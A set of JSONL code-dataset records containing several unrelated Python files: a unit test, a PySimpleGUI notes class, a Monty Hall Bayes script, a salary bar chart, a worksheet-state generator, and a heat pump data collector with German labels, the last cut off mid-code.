utils.get_online_controller,\n cluster)\n\n def test_get_nested_attr(self):\n expected_attr = Mock()\n intermediate_attr = Mock(spec=[\"expected_attr\"])\n containing_obj = Mock(spec=[\"intermediate_attr\"])\n\n intermediate_attr.expected_attr = expected_attr\n containing_obj.intermediate_attr = 
intermediate_attr\n\n existing_attr_path = [\"intermediate_attr\", \"expected_attr\"]\n self.assertEqual(\n expected_attr,\n utils.get_nested_attr(containing_obj, existing_attr_path)\n )\n\n missing_attrs_pathes = [\n [\"missing_attr\", \"expected_attr\"],\n [\"intermediate_attr\", \"missing_attr\"],\n ]\n for attr_path in missing_attrs_pathes:\n self.assertIsNone(\n utils.get_nested_attr(containing_obj, attr_path)\n )\n","repo_name":"thomasgoirand/fuel-nailgun","sub_path":"nailgun/test/unit/fuel_statistics_tests/test_utils_functions.py","file_name":"test_utils_functions.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72774847127","text":"#Class Title\r\n\r\nimport PySimpleGUI as sg\r\n\r\nimport DBServer as DB\r\n\r\nsg.theme('DarkBlack1')\r\n\r\nclass Title: # That class represents notes for one studeing metter\r\n\r\n def __init__(self, titleName, user = 'user',*spentTime):\r\n self.titleName = titleName\r\n self.user = user\r\n self.spentTime = spentTime\r\n\r\n #gef get_data_from_db(self): # That function is in control of reading data from the data base\r\n\r\n def appirance(self): # That function returnes the look of the note\r\n\r\n topic = 'Notes for: ' + self.titleName\r\n timeInvolved = f'Studyed for {self.spentTime[0]} days, {self.spentTime[1]} hours and {self.spentTime[2]} minutes.'\r\n\r\n litTableName = DB.input_modifier(self.titleName, self.user)+'topicTitles'\r\n litDict = {}\r\n litDict = DB.get_literature_dict(litTableName) # !! We need a func that going to resive title-name and open exact file. So title-name is 'key' and path to the file is 'value'\r\n \r\n layout = [\r\n [sg.Text(Text =topic, auto_size_text=True)],\r\n [sg.Text(Text =timeInvolved, auto_size_text=True), sg.Button('-TSTART-')],\r\n [sg.Combo(DB.get_literature_list(litTableName), bind_return_key=True, enable_events=True, readonly=True, k='-COMBO-')],\r\n [sg.Multiline(default_text='Tipe your notes in here.', size=(200,200,), key='-LOG-')],\r\n [sg.Input(key='-IN-', size=(10,1)), sg.CalendarButton('Choose date', close_when_date_chosen=True, target='-IN-', location=(0,0), format='%d.%m.%Y', no_titlebar=False, )]\r\n ]\r\n\r\n return sg.Tab(self.titleName, layout)\r\n\r\n #def save_result(self): # That function updates data in datdbase.\r\n","repo_name":"BochkarevArtem-ThomasCooper/Organizer-for-study","sub_path":"Class_Title.py","file_name":"Class_Title.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"865287508","text":"from __future__ import print_function, division\n\nfrom thinkbayes2 import Suite\n\n\nclass Monty(Suite):\n def Likelihood(self, data, hypo):\n \"\"\"Computes the likelihood of the data under the hypothesis.\n\n hypo: string name of the door where the prize is\n data: string name of the door Monty opened\n \"\"\"\n if hypo == data:\n return 0\n elif hypo == 'A':\n return 0.5\n else:\n return 1\n\n\ndef main():\n suite = Monty('ABC')\n suite.Update('B')\n suite.Print()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AllenDowney/ThinkBayes2","sub_path":"scripts/monty2.py","file_name":"monty2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1654,"dataset":"github-code","pt":"31"} +{"seq_id":"9667252817","text":"import xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as 
font_manager\n\n\ntree = ET.parse('每人每月薪資.xml')\nroot = tree.getroot()\n\n\ndata_set = dict()\nfor series_node in root.findall('./DataSet/Series'):\n item_name = series_node.get('ITEM')\n\n # 先只計算合計,不管男女\n if '合計' not in item_name:\n continue\n\n industry = item_name.replace(\"-合計(新台幣元)\", \"\")\n\n data_set[industry] = float(series_node.find(\n './SeriesProperty[@SERIESTYPE=\"原始值\"]/Obs[@TIME_PERIOD=\"2015\"]'\n ).get('OBS_VALUE'))\n\n# 行業列表(根據薪資排序)\nindustries = sorted(data_set, key=lambda industry: data_set[industry])\n\n# 對應的薪資列表\nsalaries = [data_set[industry] for industry in industries]\n\n# 設定中文字體\nfont = font_manager.FontProperties(fname='./mingliu.ttc')\n\n# 建立一個可以實際放圖表的地方 (figsize 可以指定大小)\nfig = plt.figure(figsize=(20, 20))\n\n# 在上面建一個可以畫圖的區域 Axes\nax = fig.add_subplot(1, 1, 1)\n\n# http://matplotlib.org/api/lines_api.html\nax.barh(range(len(industries)), salaries)\n\nax.set_title(\"歷年來「資訊及通訊傳播業」和其他行業比較\", fontsize=25, fontproperties=font)\n\nax.set_xlabel(\"收入\", fontproperties=font, fontsize=20)\n\nax.set_ylim([0, len(industries)])\nax.set_ylabel(\"行業類別\", fontproperties=font, fontsize=20)\nax.set_yticks([a + 0.5 for a in range(len(industries))])\nyticklabels = ax.set_yticklabels(industries, fontproperties=font, fontsize=16)\n\ntarget_label = yticklabels[industries.index(\"資訊及通訊傳播業\")]\ntarget_label.set_color('red')\n\nplt.show()\n","repo_name":"marco79423/mysite","sub_path":"content/articles/使用 Python 的生活日常系列 [2] - 超簡易資料分析/files/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13946547859","text":"\"\"\"\nCreates worksheet state from files needed to view a worksheet.\n\"\"\"\nimport json\nimport gzip\nfrom cluster.api.user import dataframe_to_str, bubble_table\nimport pandas as pd\n\n\ndef read_genes_csv(filename):\n df = pd.read_csv(filename, index_col=0)\n genes = set()\n for index, row in df.iterrows():\n row.dropna(inplace=True)\n genes = genes.union(set(row.astype(str).tolist()))\n\n return list(genes)\n\n\ndef write_gzip_state(out_file, marker_dicts):\n with gzip.GzipFile(out_file, 'w') as fout:\n fout.write(json.dumps(marker_dicts).encode('utf-8'))\n\n\ndef generate_worksheet_state(\n user_email,\n worksheet_name,\n dataset_name,\n clustering,\n size_by,\n color_by,\n markers_df=None,\n genes=[],\n mapping=None,\n dotplot_metrics = None,\n group = None,\n cluster_name = None,\n dataset = None,\n description = None,\n):\n \"\"\"\n\n :param user_email:\n :param worksheet_name:\n :param dataset_name:\n :param markers_df:\n :param size_by:\n :param color_by:\n :param clustering:\n :return:\n \"\"\"\n\n\n no_genes = len(genes) == 0\n if no_genes:\n genes_df = pd.DataFrame(columns=[\"row\", \"genes\"])\n colors = empty_bubble_table(clustering)\n sizes = empty_bubble_table(clustering)\n clusters = cluster_table(clustering, mapping=mapping)\n\n else:\n colors = bubble_table(markers_df, genes, color_by)\n sizes = bubble_table(markers_df, genes, size_by)\n sizes.fillna(0, inplace=True)\n #row_order = seriate(pdist(sizes))\n row_order = range(0, len(genes))\n genes_df = pd.DataFrame({\"row\": row_order, \"genes\": genes})\n #col_order = seriate(pdist(sizes.transpose()))\n clusters = cluster_table(clustering, order=None, mapping=mapping)\n\n colors.fillna(0, inplace=True)\n\n jdict = {\n \"source_user\": user_email, \"source_worksheet_name\": worksheet_name,\n \"dataset_name\": dataset_name,\n \"size_by\": size_by,\n \"color_by\": color_by,\n \"clusters\": 
dataframe_to_str(clusters, index=False),\n \"genes\": dataframe_to_str(genes_df, index=False),\n \"colors\": dataframe_to_str(colors),\n \"sizes\": dataframe_to_str(sizes),\n}\n\n if dotplot_metrics is not None:\n jdict[\"dotplot_vars\"] = dotplot_metrics\n\n if group is not None:\n jdict[\"group\"] = group\n\n if cluster_name is not None:\n jdict[\"cluster_name\"] = cluster_name\n\n if dataset is not None:\n jdict[\"dataset\"] = dataset\n\n if description is not None:\n jdict[\"description\"] = description\n\n return jdict\n\n\ndef empty_bubble_table(clustering):\n colnames = clustering.unique().tolist()\n\n colnames.insert(0, \"gene\")\n return pd.DataFrame(columns=colnames)\n\n\ndef cluster_table(clustering, order=None, mapping=None):\n \"\"\"\n\n :param clustering:\n :param order:\n :param mapping: pandas series with indecies as cluster names.\n :return:\n \"\"\"\n cluster_counts = clustering.value_counts()\n\n df = pd.DataFrame(\n columns=[\"column\", \"cluster\",\t\"cell_count\", \"bar_color\", \"cell_type\"],\n index=range(len(cluster_counts))\n )\n if mapping is not None:\n mapping = mapping.sort_values()\n df[\"column\"] = range(len(cluster_counts))\n df[\"cell_type\"] = mapping.values\n celltype_col = df[[\"column\", \"cell_type\"]]\n celltype_col = celltype_col.groupby(\"cell_type\").first()['column']\n print(celltype_col)\n for ct in mapping.unique():\n indxs = df.index[df[\"cell_type\"] == ct]\n df.loc[indxs, \"bar_color\"] = celltype_col.loc[ct]\n\n df[\"column\"] = range(len(cluster_counts))\n df[\"cell_type\"] = mapping.values\n df[\"cluster\"] = mapping.index.tolist()\n df[\"cell_count\"] = cluster_counts[mapping.index].values\n\n else:\n df[\"column\"] = range(len(cluster_counts))\n df[\"cluster\"] = cluster_counts.index\n df[\"cell_count\"] = cluster_counts.values\n df[\"bar_color\"] = 0\n #df[\"cell_type\"] = \"Unknown\"\n\n print(\"clusters df in state with mapping\", mapping)\n print(df.head())\n return df\n\n\ndef find_genes(marker_df, size=\"pct.1\", color=\"avg_diff\"):\n \"\"\"\n Hack to pick genes to show on dotplot by multiplying size and color variable.\n :param marker_dicts:\n :param cluster_solution_name:\n :param size:\n :param color:\n :return: series with genes of highest color and score product per cluster\n \"\"\"\n size_df = marker_df.pivot(\n index=\"gene\",\n columns=\"cluster\",\n values=size\n )\n\n color_df = marker_df.pivot(\n index=\"gene\",\n columns=\"cluster\",\n values=color\n )\n rank = size_df.std(axis=1) * color_df.std(axis=1)\n #print(rank.head())\n return rank.sort_values()[-40:].index\n\n\n","repo_name":"Stuartlab-UCSC/cluster-db","sub_path":"cluster/cli/create/worksheet_state.py","file_name":"worksheet_state.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73962997208","text":"import logging\nfrom connection import Connection\n\n\nclass Collection:\n \"\"\"\n\n \"\"\"\n\n\n\n def __init__(self, config):\n \"\"\"\n Erstellt die Connection und übergibt die benätigten Keys für die Wärmepumpe.\n \"\"\"\n logging.debug(\"Collection - init\")\n #\n self.__config = config\n self.__data = {}\n #\n self.__con = Connection(self.__config[\"heatpump\"][\"ip\"],\n self.__config[\"heatpump\"][\"user\"],\n self.__config[\"heatpump\"][\"pwd\"])\n #\n self.__con.set_keys([\n \"A1\", \"A2\", \"A3\", \"A4\", \"A5\", \"A6\", \"A7\", \"A8\", \"A10\", \"A11\", \"A12\", \"A13\", \"A14\", \"A15\", \"A19\", \"A25\",\n \"A26\", \"A27\", \"A28\", \"A29\", 
\"A30\", \"A31\", \"A33\", \"A34\", \"A37\", \"A38\", \"A61\", \"A90\", \"A91\", \"A92\", \"A93\",\n \"A94\", \"A95\", \"A96\", \"A97\", \"A107\", \"A108\", \"A109\", \"A139\", \"A1014\", \"A1035\", \"A1469\", \"I8\", \"I9\", \"I30\",\n \"I31\", \"I32\", \"I51\", \"I52\", \"I53\"],\n 0)\n self.__con.set_keys([], 1)\n self.__con.set_keys([], 2)\n self.__con.set_keys(\n [\"I5\", \"I6\", \"I7\", \"I10\", \"I14\", \"I18\", \"I20\", \"I22\", \"I33\", \"I41\", \"I135\", \"I263\", \"I1270\", \"I1281\",\n \"I1287\", \"I1289\", \"I1291\", \"I1293\", \"I1295\", \"I1297\", \"I1299\", \"I1319\", \"I2020\", \"I2021\", \"I2023\"],\n 3)\n self.__con.set_keys([], 4)\n #\n self.__lauf = [1, 1, 1, 1, 1]\n self.__max_lauf = [1, 5, 10, 20, 120]\n # con.get_status()\n pass\n\n\n\n def collect_data(self):\n \"\"\"\n Startet das Auslesen der Daten.\n \"\"\"\n logging.debug(\"Collection - collect_data [{0},{1},{2},{3},{4}]\".format(\n self.__lauf[0] - 1,\n self.__lauf[1] - 1,\n self.__lauf[2] - 1,\n self.__lauf[3] - 1,\n self.__lauf[4] - 1\n ))\n for i in range(0, 5):\n self.__lauf[i] -= 1\n if self.__lauf[i] < 1:\n logging.debug(\"Collection - collect_data KeySet:{0}\".format(i))\n self.__lauf[i] = self.__max_lauf[i]\n _erg = self.__con.get_values(i)\n # print(\"Status: \" + str(self.__con.get_status()))\n self.prepare(_erg)\n pass\n\n\n\n def get_all_data(self):\n \"\"\"\n Gibt alle Daten zurück.\n \"\"\"\n return self.__data\n\n\n\n def get_data(self, key):\n \"\"\"\n Gibt die einzelnen Values der Keys mit richtigem Typ zurück.\n \"\"\"\n logging.debug(\"Collection - get_data\")\n pass\n\n\n\n def into_data_int(self, data, keyname, command, german, unitname):\n try:\n val = data[keyname]\n if val[\"status\"]:\n self.__data[command] = {\n \"key\": command,\n \"value\": int(val[\"value\"]),\n \"name\": german,\n \"unit\": unitname,\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[command][\"key\"], self.__data[command][\"value\"],\n self.__data[command][\"unit\"]))\n else:\n self.__data[command][\"status\"] = False\n except KeyError:\n pass\n\n\n\n def into_data_float(self, data, keyname, command, german, unitname):\n try:\n val = data[keyname]\n if val[\"status\"]:\n self.__data[command] = {\n \"key\": command,\n \"value\": int(val[\"value\"]) / 10.0,\n \"name\": german,\n \"unit\": unitname,\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[command][\"key\"], self.__data[command][\"value\"],\n self.__data[command][\"unit\"]))\n else:\n self.__data[command][\"status\"] = False\n except KeyError:\n pass\n\n\n\n def prepare(self, data):\n \"\"\"\n Fügt die erhaltenen Daten in die passenden Keys ein.\n siehe: https://github.com/openhab/openhab1-addons/blob/master/bundles/binding/org.openhab.binding.ecotouch/src/main/java/org/openhab/binding/ecotouch/EcoTouchTags.java\n \"\"\"\n logging.debug(\"Collection - prepare\")\n\n #\n #\n #\n\n self.into_data_float(data, \"A1\", \"temp_outside\", \"Außentemperatur\", \"°C\")\n self.into_data_float(data, \"A2\", \"temp_outside_1h\", \"Außentemperatur gemittelt über 1h\", \"°C\")\n self.into_data_float(data, \"A3\", \"temp_outside_24h\", \"Außentemperatur gemittelt über 24h\", \"°C\")\n self.into_data_float(data, \"A4\", \"temp_source_in\", \"Quelle Eintritt Temp.\", \"°C\")\n self.into_data_float(data, \"A5\", \"temp_source_out\", \"Quelle Austritt Temp.\", \"°C\")\n self.into_data_float(data, \"A6\", \"temp_evaporation\", \"Verdampfungs Temp.\", \"°C\")\n 
self.into_data_float(data, \"A7\", \"temp_suction\", \"Sauggastemperatur\", \"°C\")\n self.into_data_float(data, \"A8\", \"press_evaporation\", \"Verdampfungsdruck\", \"bar\")\n self.into_data_float(data, \"A10\", \"temp_return_set\", \"Temperatur Rücklauf Soll\", \"°C\")\n self.into_data_float(data, \"A11\", \"temp_return\", \"Temperatur Rücklauf\", \"°C\")\n self.into_data_float(data, \"A12\", \"temp_flow\", \"Temperatur Vorlauf\", \"°C\")\n self.into_data_float(data, \"A13\", \"temp_condensation2\", \"Kondensationstemperatur 2\", \"°C\")\n self.into_data_float(data, \"A14\", \"temp_condensation\", \"Kondensationstemperatur\", \"°C\")\n self.into_data_float(data, \"A15\", \"press_condensation\", \"Kondensationsdruck\", \"bar\")\n self.into_data_float(data, \"A19\", \"temp_water\", \"Warmwasser-Temp. Aktuell\", \"°C\")\n self.into_data_float(data, \"A25\", \"power_compressor\", \"elektrische Leistung Verdichter\", \"kW\")\n self.into_data_float(data, \"A26\", \"power_heating\", \"abgegebene thermische Heizleistung der Wärmepumpe\", \"kW\")\n self.into_data_float(data, \"A27\", \"power_cooling\", \"abgegebene thermische KälteLeistung der Wärmepumpe\", \"kW\")\n self.into_data_float(data, \"A28\", \"cop_heating\", \"COP Heizleistung\", \"\")\n self.into_data_float(data, \"A29\", \"cop_cooling\", \"COP Kälteleistungleistung\", \"\")\n self.into_data_float(data, \"A30\", \"temp_heating\", \"Heizen-Temp. Akt. Rücklauf\", \"°C\")\n self.into_data_float(data, \"A31\", \"temp_heating_set\", \"Heizen-Temp. Soll\", \"°C\")\n self.into_data_float(data, \"A33\", \"temp_cooling_return\", \"Aktuelle Kühlkreistemperatur\", \"°C\")\n self.into_data_float(data, \"A34\", \"temp_cooling_set\", \"Geforderte Temperatur im Kühlbetrieb\", \"°C\")\n self.into_data_float(data, \"A37\", \"temp_water_set\", \"Warmwasser-Temp. Soll\", \"°C\")\n self.into_data_float(data, \"A38\", \"temp_water_set2\", \"Warmwasser-Temp. Sollwert\", \"°C\")\n self.into_data_float(data, \"A61\", \"hysteresis_heating\", \"Schaltdifferenz Heizen\", \"°C\")\n self.into_data_float(data, \"A90\", \"temp_out_1h_heating\", \"Heizkurve - Außentemperatur 1h\", \"°C\")\n self.into_data_float(data, \"A91\", \"temp_nvi_outside_x1\", \"Heizkurve - T-Norm-Aussen (x1)\", \"°C\")\n self.into_data_float(data, \"A92\", \"temp_nvi_heating_y1\", \"Heizkurve - T-Heizkreis-Norm (y1)\", \"°C\")\n self.into_data_float(data, \"A93\", \"temp_nvi_outside_x2\", \"Heizkurve - T-Heizgrenze (x2)\", \"°C\")\n self.into_data_float(data, \"A94\", \"temp_nvi_heating_y2\", \"Heizkurve - T-Heizgrenze-Soll (y2)\", \"°C\")\n self.into_data_float(data, \"A95\", \"nvi_temp_max\", \"Heizkurve max. VL-Temp\", \"°C\")\n self.into_data_float(data, \"A96\", \"temp_nvi_heating_set\", \"Heiztemperatur Soll\", \"°C\")\n self.into_data_float(data, \"A97\", \"temp_set_0deg\", \"Heizkreis Soll-Temp bei 0° Aussen\", \"°C\")\n self.into_data_float(data, \"A107\", \"hysteresis_cooling\", \"Schaltdifferenz Kühlen\", \"°C\")\n self.into_data_float(data, \"A108\", \"temp_cooling_enable\", \"Kühlen Einschalt-Temp. 
Aussentemp\", \"°C\")\n self.into_data_float(data, \"A109\", \"temp_cooling\", \"Heizkurve - nviSollKuehlen\", \"°C\")\n self.into_data_float(data, \"A139\", \"hysteresis_water\", \"Schaltdifferenz Warmwasser\", \"°C\")\n self.into_data_float(data, \"A1014\", \"temp_dt\", \"Temperatur dT\", \"°C\")\n self.into_data_float(data, \"A1035\", \"temp_source_dt\", \"Quelle dT\", \"°C\")\n self.into_data_float(data, \"A1469\", \"expansion_valve\", \"% Ventilöffnung elektrisches Expansionsventil\", \"%\")\n self.into_data_int(data, \"I5\", \"date_day\", \"Datum: Tag\", \"\")\n self.into_data_int(data, \"I6\", \"date_month\", \"Datum: Monat\", \"\")\n self.into_data_int(data, \"I7\", \"date_year\", \"Datum: Jahr\", \"\")\n self.into_data_int(data, \"I8\", \"time_hour\", \"Uhrzeit: Stunde\", \"\")\n self.into_data_int(data, \"I9\", \"time_minute\", \"Uhrzeit: Minute\", \"\")\n self.into_data_int(data, \"I10\", \"operating_hours_compressor1\", \"Betriebsstunden Verdichter 1\", \"h\")\n self.into_data_int(data, \"I14\", \"operating_hours_compressor2\", \"Betriebsstunden Verdichter 2\", \"h\")\n self.into_data_int(data, \"I18\", \"operating_hours_circulation_pump\", \"Betriebsstunden Heizungsumwälzpumpe\",\n \"h\")\n self.into_data_int(data, \"I20\", \"operating_hours_source_pump\", \"Betriebsstunden Quellenpumpe\", \"h\")\n self.into_data_int(data, \"I22\", \"operating_hours_solar\", \"Betriebsstunden Solarkreis\", \"h\")\n self.into_data_int(data, \"I30\", \"enable_heating\", \"Handabschaltung Heizbetrieb\", \"\")\n self.into_data_int(data, \"I31\", \"enable_cooling\", \"Handabschaltung Kühlbetrieb\", \"\")\n self.into_data_int(data, \"I32\", \"enable_warmwater\", \"Handabschaltung Warmwasserbetrieb\", \"\")\n self.into_data_int(data, \"I33\", \"enable_pool\", \"Handabschaltung Pool_Heizbetrieb\", \"\")\n self.into_data_int(data, \"I41\", \"enable_pv\", \"Betriebsmodus PV 0=Aus, 1=Auto, 2=Ein\", \"\")\n self.into_data_int(data, \"I52\", \"alarm\", \"Meldungen von Ausfällen F0xx die zum Wärmepumpenausfall führen\", \"\")\n self.into_data_int(data, \"I53\", \"interruptions\", \"Unterbrechungen\", \"\")\n self.into_data_int(data, \"I135\", \"state_service\", \"Serviceebene (0: normal, 1: service)\", \"\")\n self.into_data_float(data, \"I263\", \"adapt_heating\", \"Temperaturanpassung für die Heizung\", \"°C\")\n self.into_data_int(data, \"I1270\", \"manual_heatingpump\", \"Handschaltung Heizungspumpe (H-0-A)\", \"\")\n self.into_data_int(data, \"I1281\", \"manual_sourcepump\", \"Handschaltung Quellenpumpe (H-0-A)\", \"\")\n self.into_data_int(data, \"I1287\", \"manual_solarpump1\", \"Handschaltung Solarpumpe 1 (H-0-A)\", \"\")\n self.into_data_int(data, \"I1289\", \"manual_solarpump2\", \"Handschaltung Solarpumpe 2 (H-0-A)\", \"\")\n self.into_data_int(data, \"I1291\", \"manual_tankpump\", \"Handschaltung Speicherladepumpe (H-0-A)\", \"\")\n self.into_data_int(data, \"I1293\", \"manual_valve\", \"Handschaltung Brauchwasserventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1295\", \"manual_poolvalve\", \"Handschaltung Poolventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1297\", \"manual_coolvalve\", \"Handschaltung Kühlventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1299\", \"manual_4wayvalve\", \"Handschaltung Vierwegeventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1319\", \"manual_multiext\", \"Handschaltung Multiausgang Ext. 
(H-0-A)\", \"\")\n self.into_data_float(data, \"I2020\", \"temp_surrounding\", \"Umgebung\", \"°C\")\n self.into_data_float(data, \"I2021\", \"temp_suction_air\", \"Sauggas\", \"°C\")\n self.into_data_float(data, \"I2023\", \"temp_sump\", \"Ölsumpf\", \"°C\")\n\n #\n # \"I51\" : \"state\" : \"Status der Wärmepumpenkomponenten\"\n #\n self.into_data_int(data, \"I51\", \"state\", \"Status der Wärmepumpenkomponenten\", \"\")\n\n #\n # \"I51.0\" : \"state_sourcepump\" : \"Status der Wärmepumpenkomponenten: Quellenpumpe\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_sourcepump\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[0],\n \"name\": \"Status der Wärmepumpenkomponenten: Quellenpumpe\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.1\" : \"state_heatingpump\" : \"Status der Wärmepumpenkomponenten: Heizungsumwälzpumpe\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_heatingpump\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[1],\n \"name\": \"Status der Wärmepumpenkomponenten: Heizungsumwälzpumpe\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.2\" : \"state_evd\" : \"Status der Wärmepumpenkomponenten: Freigabe Regelung EVD\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_evd\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[2],\n \"name\": \"Status der Wärmepumpenkomponenten: Freigabe Regelung EVD\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.3\" : \"state_compressor1\" : \"Status der Wärmepumpenkomponenten: Verdichter 1\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_compressor1\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[3],\n \"name\": \"Status der Wärmepumpenkomponenten: Verdichter 1\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.4\" : \"state_compressor2\" : \"Status der Wärmepumpenkomponenten: Verdichter 2\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_compressor2\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[4],\n \"name\": \"Status der Wärmepumpenkomponenten: Verdichter 2\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n 
self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.5\" : \"state_extheater\" : \"Status der Wärmepumpenkomponenten: externer Wärmeerzeuger\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_extheater\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[5],\n \"name\": \"Status der Wärmepumpenkomponenten: externer Wärmeerzeuger\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.6\" : \"state_alarm\" : \"Status der Wärmepumpenkomponenten: Alarmausgang\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_alarm\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[6],\n \"name\": \"Status der Wärmepumpenkomponenten: Alarmausgang\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.7\" : \"state_cooling\" : \"Status der Wärmepumpenkomponenten: Motorventil Kühlbetrieb\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_cooling\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[7],\n \"name\": \"Status der Wärmepumpenkomponenten: Motorventil Kühlbetrieb\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.8\" : \"state_water\" : \"Status der Wärmepumpenkomponenten: Motorventil Warmwasser\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_water\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[8],\n \"name\": \"Status der Wärmepumpenkomponenten: Motorventil Warmwasser\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.9\" : \"state_pool\" : \"Status der Wärmepumpenkomponenten: Motorventil Pool\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_pool\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[9],\n \"name\": \"Status der Wärmepumpenkomponenten: Motorventil Pool\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.10\" : \"state_solar\" : \"Status der Wärmepumpenkomponenten: Solarbetrieb\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_solar\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": 
